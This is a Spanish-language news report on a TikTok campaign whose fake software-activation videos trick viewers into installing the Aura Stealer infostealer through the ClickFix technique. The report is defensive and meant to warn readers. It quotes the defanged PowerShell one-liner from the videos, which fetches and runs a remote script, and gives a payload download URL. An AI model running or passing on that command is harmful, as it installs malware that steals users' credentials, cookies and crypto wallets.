Los ciberdelincuentes están distribuyendo malware para robar información a través de una campaña en TikTok, utilizando videos que afirman falsamente ser guías de activación gratuitas para software popular. La operación en curso, identificada el 19 de octubre de 2025, utiliza un método de ingeniería social para engañar a los usuarios para que infecten sus propias computadoras. El responsable de ISC, Xavier Mertens, informó sobre la campaña y señaló sus similitudes con una operación observada por Trend Micro en mayo. Los videos de TikTok pretenden ofrecer instrucciones para activar software legítimo como Windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Pro y Discord Nitro. La campaña también promueve servicios inventados, incluidos “Netflix Premium” y “Spotify Premium”, para atraer a una audiencia más amplia. La técnica de ataque se conoce como ataque ClickFix, y consiste en proporcionar instrucciones aparentemente útiles que engañan a los usuarios para que ejecuten comandos maliciosos. Los videos muestran un comando PowerShell breve de una línea e indican a los espectadores que lo ejecuten con privilegios de administrador. Un comando de ejemplo que se muestra es iex (irm slmgr[.]win/photoshop). El nombre del programa específico dentro de la URL, como “photoshop”, se modifica para que coincida con el software que se hace pasar por el video. Cuando un usuario ejecuta este comando, PowerShell se conecta al sitio remoto slmgr[.]win. Esta acción recupera y ejecuta un segundo script de PowerShell, que luego descarga dos archivos ejecutables de las páginas de Cloudflare. El primer archivo, descargado de https://file-epq[.]pages[.]dev/updater.exees una variante del malware Aura Stealer. Aura Stealer está diseñado para recopilar credenciales guardadas de navegadores web, cookies de autenticación, billeteras de criptomonedas y datos de inicio de sesión de otras aplicaciones. Esta información robada luego se carga a los atacantes, lo que les otorga acceso a las cuentas de la víctima. Una segunda carga útil, llamada source.exetambién se descarga. Este ejecutable se utiliza para autocompilar código utilizando el compilador Visual C# integrado de .NET Framework (csc.exe). Posteriormente, el código compilado se inyecta y lanza directamente en la memoria. Aún no se ha determinado el propósito específico de esta segunda carga útil. Los usuarios que hayan seguido las instrucciones de estos videos deben considerar todas sus credenciales comprometidas y se les recomienda restablecer inmediatamente las contraseñas de todos los sitios web y servicios en línea que utilicen. Los ataques ClickFix se han vuelto significativamente más comunes durante el año pasado. Se utilizan para distribuir diversas cepas de malware en campañas relacionadas con ransomware y robo de criptomonedas. Como práctica de seguridad general, los usuarios nunca deben copiar texto de un sitio web y ejecutarlo en un cuadro de diálogo del sistema operativo, incluida la barra de direcciones del Explorador de archivos, el símbolo del sistema, PowerShell, el terminal macOS o los shells de Linux.
Source: Los videos de TikTok difunden Aura Stealer a través de guías de software falsas
